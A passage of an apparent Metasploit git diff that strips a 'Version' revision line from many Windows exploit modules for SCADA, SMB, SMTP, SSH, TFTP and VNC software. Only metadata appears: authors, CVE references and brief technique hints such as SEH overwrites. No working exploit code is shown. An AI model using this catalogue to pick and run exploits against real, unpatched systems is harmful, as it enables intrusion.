MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'Luigi Auriemma ', #Initial discovery, poc diff --git a/modules/exploits/windows/scada/igss9_misc.rb b/modules/exploits/windows/scada/igss9_misc.rb index e921f8e713..c8644cbdf4 100644 --- a/modules/exploits/windows/scada/igss9_misc.rb +++ b/modules/exploits/windows/scada/igss9_misc.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote that payload with a CreateProcessA() function as a new thread. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'Luigi Auriemma', #Initial discovery, poc diff --git a/modules/exploits/windows/scada/moxa_mdmtool.rb b/modules/exploits/windows/scada/moxa_mdmtool.rb index caffad8826..fcac4c33f6 100644 --- a/modules/exploits/windows/scada/moxa_mdmtool.rb +++ b/modules/exploits/windows/scada/moxa_mdmtool.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Ruben Santamarta', 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-4741'], diff --git a/modules/exploits/windows/scada/procyon_core_server.rb b/modules/exploits/windows/scada/procyon_core_server.rb index 606b9d2366..edc6f9e86a 100644 --- a/modules/exploits/windows/scada/procyon_core_server.rb +++ b/modules/exploits/windows/scada/procyon_core_server.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote payload exits, Coreservice.exe should automatically recover. }, 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Author' => [ 'Knud Hojgaard ', # Initial discovery diff --git a/modules/exploits/windows/scada/realwin.rb b/modules/exploits/windows/scada/realwin.rb index 852e80d824..5786756cdc 100644 --- a/modules/exploits/windows/scada/realwin.rb +++ b/modules/exploits/windows/scada/realwin.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-4322' ], diff --git a/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb b/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb index 66c1848158..57dd677404 100644 --- a/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb +++ b/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb @@ -29,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Luigi Auriemma', 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-1563'], diff --git a/modules/exploits/windows/scada/realwin_on_fcs_login.rb b/modules/exploits/windows/scada/realwin_on_fcs_login.rb index feb1fa8a4f..f56139efe0 100644 --- a/modules/exploits/windows/scada/realwin_on_fcs_login.rb +++ b/modules/exploits/windows/scada/realwin_on_fcs_login.rb @@ -30,7 +30,6 @@ class Metasploit3 < Msf::Exploit::Remote 'B|H ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-1563'], diff --git a/modules/exploits/windows/scada/realwin_scpc_initialize.rb b/modules/exploits/windows/scada/realwin_scpc_initialize.rb index d9268f72f2..8ed3420515 100644 --- a/modules/exploits/windows/scada/realwin_scpc_initialize.rb +++ b/modules/exploits/windows/scada/realwin_scpc_initialize.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Luigi Auriemma', 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '68812' ], diff --git a/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb b/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb index d1f6228a7a..bd3b4082ef 100644 --- a/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb +++ b/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Luigi Auriemma', 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '68812' ], diff --git a/modules/exploits/windows/scada/realwin_scpc_txtevent.rb b/modules/exploits/windows/scada/realwin_scpc_txtevent.rb index 9ab3f85a3d..0311afefcf 100644 --- a/modules/exploits/windows/scada/realwin_scpc_txtevent.rb +++ b/modules/exploits/windows/scada/realwin_scpc_txtevent.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Luigi Auriemma', 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-4142'], diff --git a/modules/exploits/windows/scada/scadapro_cmdexe.rb b/modules/exploits/windows/scada/scadapro_cmdexe.rb index 06027407e5..291d9e2fb2 100644 --- a/modules/exploits/windows/scada/scadapro_cmdexe.rb +++ b/modules/exploits/windows/scada/scadapro_cmdexe.rb @@ -30,7 +30,6 @@ class Metasploit3 < Msf::Exploit::Remote 'mr_me ', # msf 'TecR0c ', # msf ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-3497'], diff --git a/modules/exploits/windows/scada/winlog_runtime.rb b/modules/exploits/windows/scada/winlog_runtime.rb index a7e87ff683..592a53ff6f 100644 --- a/modules/exploits/windows/scada/winlog_runtime.rb +++ b/modules/exploits/windows/scada/winlog_runtime.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Luigi Auriemma', 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-0517' ], diff --git a/modules/exploits/windows/sip/aim_triton_cseq.rb b/modules/exploits/windows/sip/aim_triton_cseq.rb index 8d4c7e4b3d..c403bf5023 100644 --- a/modules/exploits/windows/sip/aim_triton_cseq.rb +++ b/modules/exploits/windows/sip/aim_triton_cseq.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote the affected application. }, 'Author' => 'MC', - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-3524'], diff --git a/modules/exploits/windows/sip/sipxezphone_cseq.rb b/modules/exploits/windows/sip/sipxezphone_cseq.rb index 1641d8f701..db6a6093a3 100644 --- a/modules/exploits/windows/sip/sipxezphone_cseq.rb +++ b/modules/exploits/windows/sip/sipxezphone_cseq.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote the affected application. }, 'Author' => 'MC', - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-3524'], diff --git a/modules/exploits/windows/sip/sipxphone_cseq.rb b/modules/exploits/windows/sip/sipxphone_cseq.rb index 2e11c728b0..5823b21176 100644 --- a/modules/exploits/windows/sip/sipxphone_cseq.rb +++ b/modules/exploits/windows/sip/sipxphone_cseq.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote the affected application. }, 'Author' => 'MC', - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-3524' ], diff --git a/modules/exploits/windows/smb/ms03_049_netapi.rb b/modules/exploits/windows/smb/ms03_049_netapi.rb index e856dbb89f..d9add5404a 100644 --- a/modules/exploits/windows/smb/ms03_049_netapi.rb +++ b/modules/exploits/windows/smb/ms03_049_netapi.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2003-0812' ], diff --git a/modules/exploits/windows/smb/ms04_007_killbill.rb b/modules/exploits/windows/smb/ms04_007_killbill.rb index d88c1c8096..30ff256c27 100644 --- a/modules/exploits/windows/smb/ms04_007_killbill.rb +++ b/modules/exploits/windows/smb/ms04_007_killbill.rb @@ -39,7 +39,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Solar Eclipse ' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2003-0818'], diff --git a/modules/exploits/windows/smb/ms04_011_lsass.rb b/modules/exploits/windows/smb/ms04_011_lsass.rb index cae29bc75c..0fbb4d138b 100644 --- a/modules/exploits/windows/smb/ms04_011_lsass.rb +++ b/modules/exploits/windows/smb/ms04_011_lsass.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2003-0533' ], diff --git a/modules/exploits/windows/smb/ms04_031_netdde.rb b/modules/exploits/windows/smb/ms04_031_netdde.rb index b7d03ed480..a9220cc071 100644 --- a/modules/exploits/windows/smb/ms04_031_netdde.rb +++ b/modules/exploits/windows/smb/ms04_031_netdde.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'pusscat' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-0206'], diff --git a/modules/exploits/windows/smb/ms05_039_pnp.rb b/modules/exploits/windows/smb/ms05_039_pnp.rb index 4c44d7a318..2e90692c37 100644 --- a/modules/exploits/windows/smb/ms05_039_pnp.rb +++ b/modules/exploits/windows/smb/ms05_039_pnp.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm', 'cazz' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-1983' ], diff --git a/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb b/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb index bafce063a7..ec87770a10 100644 --- a/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb +++ b/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb @@ -32,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'pusscat', 'hdm' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-2370' ], diff --git a/modules/exploits/windows/smb/ms06_025_rras.rb b/modules/exploits/windows/smb/ms06_025_rras.rb index 70540890bf..35b1001752 100644 --- a/modules/exploits/windows/smb/ms06_025_rras.rb +++ b/modules/exploits/windows/smb/ms06_025_rras.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-2370' ], diff --git a/modules/exploits/windows/smb/ms06_040_netapi.rb b/modules/exploits/windows/smb/ms06_040_netapi.rb index 8777b1e68c..9bc8c11b9f 100644 --- a/modules/exploits/windows/smb/ms06_040_netapi.rb +++ b/modules/exploits/windows/smb/ms06_040_netapi.rb @@ -30,7 +30,6 @@ class Metasploit3 < Msf::Exploit::Remote 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-3439' ], diff --git a/modules/exploits/windows/smb/ms06_066_nwapi.rb b/modules/exploits/windows/smb/ms06_066_nwapi.rb index 951b9d18a1..48e1bf5096 100644 --- a/modules/exploits/windows/smb/ms06_066_nwapi.rb +++ b/modules/exploits/windows/smb/ms06_066_nwapi.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'pusscat' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-4688'], diff --git a/modules/exploits/windows/smb/ms06_066_nwwks.rb b/modules/exploits/windows/smb/ms06_066_nwwks.rb index ebbdd5bfac..77e96bc970 100644 --- a/modules/exploits/windows/smb/ms06_066_nwwks.rb +++ b/modules/exploits/windows/smb/ms06_066_nwwks.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'pusscat' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-4688'], diff --git a/modules/exploits/windows/smb/ms06_070_wkssvc.rb b/modules/exploits/windows/smb/ms06_070_wkssvc.rb index 9f0a65be70..ab73292cf8 100644 --- a/modules/exploits/windows/smb/ms06_070_wkssvc.rb +++ b/modules/exploits/windows/smb/ms06_070_wkssvc.rb @@ -35,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-4691' ], diff --git a/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb b/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb index 1ff0e5f9bd..7e58942e6f 100644 --- a/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb +++ b/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb @@ -32,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Unknown' # 2 unknown contributors (2003 support) ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2007-1748'], diff --git a/modules/exploits/windows/smb/ms08_067_netapi.rb b/modules/exploits/windows/smb/ms08_067_netapi.rb index 924aced2e8..3723b72fc8 100644 --- a/modules/exploits/windows/smb/ms08_067_netapi.rb +++ b/modules/exploits/windows/smb/ms08_067_netapi.rb @@ -38,7 +38,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck', # XP SP2/SP3 AlwaysOn DEP bypass ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-4250'], diff --git a/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb b/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb index c195e62b9b..ed065abe6e 100644 --- a/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb +++ b/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => [ 'Laurent Gaffie ', 'hdm', 'sf' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'MSB', 'MS09-050' ], diff --git a/modules/exploits/windows/smb/ms10_061_spoolss.rb b/modules/exploits/windows/smb/ms10_061_spoolss.rb index 899f3dcb82..42206d722a 100644 --- a/modules/exploits/windows/smb/ms10_061_spoolss.rb +++ b/modules/exploits/windows/smb/ms10_061_spoolss.rb @@ -39,7 +39,6 @@ class Metasploit3 < Msf::Exploit::Remote 'hdm' # ATSVC RPC proxy method, etc ;) ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Platform' => 'win', 'References' => [ diff --git a/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb b/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb index 2d89211b40..04c38e8b6d 100644 --- a/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb +++ b/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC', 'Ruben Santamarta' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-1350' ], diff --git a/modules/exploits/windows/smb/psexec.rb b/modules/exploits/windows/smb/psexec.rb index 03fc5e4931..14b3454d45 100644 --- a/modules/exploits/windows/smb/psexec.rb +++ b/modules/exploits/windows/smb/psexec.rb @@ -46,7 +46,6 @@ class Metasploit3 < Msf::Exploit::Remote 'hdm', ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Privileged' => true, 'DefaultOptions' => { diff --git a/modules/exploits/windows/smb/smb_relay.rb b/modules/exploits/windows/smb/smb_relay.rb index 982968ef76..0bc45cb8a4 100644 --- a/modules/exploits/windows/smb/smb_relay.rb +++ b/modules/exploits/windows/smb/smb_relay.rb @@ -63,7 +63,6 @@ class Metasploit3 < Msf::Exploit::Remote 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Privileged' => true, 'DefaultOptions' => { diff --git a/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb b/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb index a124ec9b90..30e4937996 100644 --- a/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb +++ b/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb @@ -36,7 +36,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'bannedit' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-1394' ], diff --git a/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb b/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb index 7a2562bcaa..ee25f3e722 100644 --- a/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb +++ b/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-1638' ], diff --git a/modules/exploits/windows/smtp/mercury_cram_md5.rb b/modules/exploits/windows/smtp/mercury_cram_md5.rb index 640fe6e801..e0379df49e 100644 --- a/modules/exploits/windows/smtp/mercury_cram_md5.rb +++ b/modules/exploits/windows/smtp/mercury_cram_md5.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote may be able to execute arbitrary code. }, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-4440' ], diff --git a/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb b/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb index 5eac1166bf..f3ca211cec 100644 --- a/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb +++ b/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'hdm', # original module 'patrick', # msf3 port :) ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2003-0714' ], diff --git a/modules/exploits/windows/smtp/njstar_smtp_bof.rb b/modules/exploits/windows/smtp/njstar_smtp_bof.rb index 004c90232e..1fec8e6545 100644 --- a/modules/exploits/windows/smtp/njstar_smtp_bof.rb +++ b/modules/exploits/windows/smtp/njstar_smtp_bof.rb @@ -31,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Dillon Beresford', # Original discovery and MSF Module. ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '76728' ], diff --git a/modules/exploits/windows/smtp/wmailserver.rb b/modules/exploits/windows/smtp/wmailserver.rb index 05fac2e4ec..7304dc55e7 100644 --- a/modules/exploits/windows/smtp/wmailserver.rb +++ b/modules/exploits/windows/smtp/wmailserver.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote (SMTP) via a SEH frame overwrite. }, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-2287' ], diff --git a/modules/exploits/windows/smtp/ypops_overflow1.rb b/modules/exploits/windows/smtp/ypops_overflow1.rb index ca14a6e580..881879ad99 100644 --- a/modules/exploits/windows/smtp/ypops_overflow1.rb +++ b/modules/exploits/windows/smtp/ypops_overflow1.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote jmp ebx opcode in ws_32.dll }, 'Author' => [ 'acaro ' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-1558'], diff --git a/modules/exploits/windows/ssh/freeftpd_key_exchange.rb b/modules/exploits/windows/ssh/freeftpd_key_exchange.rb index 1568d286ab..a42eb89173 100644 --- a/modules/exploits/windows/ssh/freeftpd_key_exchange.rb +++ b/modules/exploits/windows/ssh/freeftpd_key_exchange.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'riaf ', 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-2407'], diff --git a/modules/exploits/windows/ssh/freesshd_key_exchange.rb b/modules/exploits/windows/ssh/freesshd_key_exchange.rb index a93aadd0f4..5fa9f4c614 100644 --- a/modules/exploits/windows/ssh/freesshd_key_exchange.rb +++ b/modules/exploits/windows/ssh/freesshd_key_exchange.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-2407'], diff --git a/modules/exploits/windows/ssh/putty_msg_debug.rb b/modules/exploits/windows/ssh/putty_msg_debug.rb index a11dbe6a6a..afaf7af9d9 100644 --- a/modules/exploits/windows/ssh/putty_msg_debug.rb +++ b/modules/exploits/windows/ssh/putty_msg_debug.rb @@ -19,7 +19,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2002-1359' ], diff --git a/modules/exploits/windows/ssh/securecrt_ssh1.rb b/modules/exploits/windows/ssh/securecrt_ssh1.rb index d7e1bed10b..6e7e125f91 100644 --- a/modules/exploits/windows/ssh/securecrt_ssh1.rb +++ b/modules/exploits/windows/ssh/securecrt_ssh1.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2002-1059' ], diff --git a/modules/exploits/windows/ssl/ms04_011_pct.rb b/modules/exploits/windows/ssl/ms04_011_pct.rb index 690d6790c0..b192ea90ba 100644 --- a/modules/exploits/windows/ssl/ms04_011_pct.rb +++ b/modules/exploits/windows/ssl/ms04_011_pct.rb @@ -32,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2003-0719'], diff --git a/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb b/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb index 76cd430efe..8a6bf3ce31 100644 --- a/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb +++ b/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => [ 'patrick' ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2000-0665'], diff --git a/modules/exploits/windows/telnet/goodtech_telnet.rb b/modules/exploits/windows/telnet/goodtech_telnet.rb index 684e5ce990..6f618ab8c8 100644 --- a/modules/exploits/windows/telnet/goodtech_telnet.rb +++ b/modules/exploits/windows/telnet/goodtech_telnet.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => 'MC', - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-0768' ], diff --git a/modules/exploits/windows/tftp/attftp_long_filename.rb b/modules/exploits/windows/tftp/attftp_long_filename.rb index 306b370a50..d808463791 100644 --- a/modules/exploits/windows/tftp/attftp_long_filename.rb +++ b/modules/exploits/windows/tftp/attftp_long_filename.rb @@ -20,7 +20,6 @@ class Metasploit3 < Msf::Exploit::Remote request (get/write) for an overly long file name. }, 'Author' => [ 'patrick' ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-6184'], diff --git a/modules/exploits/windows/tftp/dlink_long_filename.rb b/modules/exploits/windows/tftp/dlink_long_filename.rb index 315228ba6b..e58f025a3e 100644 --- a/modules/exploits/windows/tftp/dlink_long_filename.rb +++ b/modules/exploits/windows/tftp/dlink_long_filename.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote 'LSO ', # Exploit module 'patrick', # Refs, stability, targets etc ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-1435' ], diff --git a/modules/exploits/windows/tftp/futuresoft_transfermode.rb b/modules/exploits/windows/tftp/futuresoft_transfermode.rb index c67505ee86..ae741b0194 100644 --- a/modules/exploits/windows/tftp/futuresoft_transfermode.rb +++ b/modules/exploits/windows/tftp/futuresoft_transfermode.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote Windows 2000 Server (could not trigger the overflow at all). }, 'Author' => 'MC', - 'Version' => '$Revision$', 'References' => [ ['CVE', '2005-1812'], diff --git a/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb b/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb index 15f7586966..7ebf7dfd95 100644 --- a/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb +++ b/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote in a DoS. This is a port of a sploit by Mati "muts" Aharoni. }, 'Author' => 'Saint Patrick', - 'Version' => '$Revision$', 'References' => [ ['CVE', '2008-1610'], diff --git a/modules/exploits/windows/tftp/tftpd32_long_filename.rb b/modules/exploits/windows/tftp/tftpd32_long_filename.rb index f8915d4189..cd0b823724 100644 --- a/modules/exploits/windows/tftp/tftpd32_long_filename.rb +++ b/modules/exploits/windows/tftp/tftpd32_long_filename.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote execute arbitrary code on the system. }, 'Author' => 'MC', - 'Version' => '$Revision$', 'References' => [ ['CVE', '2002-2226'], diff --git a/modules/exploits/windows/tftp/tftpdwin_long_filename.rb b/modules/exploits/windows/tftp/tftpdwin_long_filename.rb index c8eb8a0289..6acef18d24 100644 --- a/modules/exploits/windows/tftp/tftpdwin_long_filename.rb +++ b/modules/exploits/windows/tftp/tftpdwin_long_filename.rb @@ -20,7 +20,6 @@ class Metasploit3 < Msf::Exploit::Remote an overly long file name to the tftpd.exe server, the stack can be overwritten. }, 'Author' => [ 'patrick' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-4948' ], diff --git a/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb b/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb index 6b6ee6abca..f433fc0071 100644 --- a/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb +++ b/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote arbitrary code on the system. }, 'Author' => 'MC', - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-6183'], diff --git a/modules/exploits/windows/unicenter/cam_log_security.rb b/modules/exploits/windows/unicenter/cam_log_security.rb index ea2581a231..a80d9bd0d8 100644 --- a/modules/exploits/windows/unicenter/cam_log_security.rb +++ b/modules/exploits/windows/unicenter/cam_log_security.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2005-2668'], diff --git a/modules/exploits/windows/vnc/realvnc_client.rb b/modules/exploits/windows/vnc/realvnc_client.rb index 876ee4caba..679c8198c5 100644 --- a/modules/exploits/windows/vnc/realvnc_client.rb +++ b/modules/exploits/windows/vnc/realvnc_client.rb @@ -18,7 +18,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2001-0167' ], diff --git a/modules/exploits/windows/vnc/ultravnc_client.rb b/modules/exploits/windows/vnc/ultravnc_client.rb index 0f2aea4290..52c2a1c485 100644 --- a/modules/exploits/windows/vnc/ultravnc_client.rb +++ b/modules/exploits/windows/vnc/ultravnc_client.rb @@ -19,7 +19,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-1652' ], diff --git a/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb b/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb index 65c1e3c468..42c379d080 100644 --- a/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb +++ b/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'noperand', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-0610' ], diff --git a/modules/exploits/windows/vnc/winvnc_http_get.rb b/modules/exploits/windows/vnc/winvnc_http_get.rb index 208585b229..f0a0ccb507 100644 --- a/modules/exploits/windows/vnc/winvnc_http_get.rb +++ b/modules/exploits/windows/vnc/winvnc_http_get.rb @@ -24,7 +24,6 @@ require 'msf/core' }, 'Author' => 'patrick', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'BID', '2306' ], diff --git a/modules/exploits/windows/vpn/safenet_ike_11.rb b/modules/exploits/windows/vpn/safenet_ike_11.rb index 579ca014e8..a769311a18 100644 --- a/modules/exploits/windows/vpn/safenet_ike_11.rb +++ b/modules/exploits/windows/vpn/safenet_ike_11.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote windows/meterpreter/reverse_ord_tcp payloads. }, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-1943' ], diff --git a/modules/exploits/windows/wins/ms04_045_wins.rb b/modules/exploits/windows/wins/ms04_045_wins.rb index 7f8fecd435..cb8fab4688 100644 --- a/modules/exploits/windows/wins/ms04_045_wins.rb +++ b/modules/exploits/windows/wins/ms04_045_wins.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-1080'], diff --git 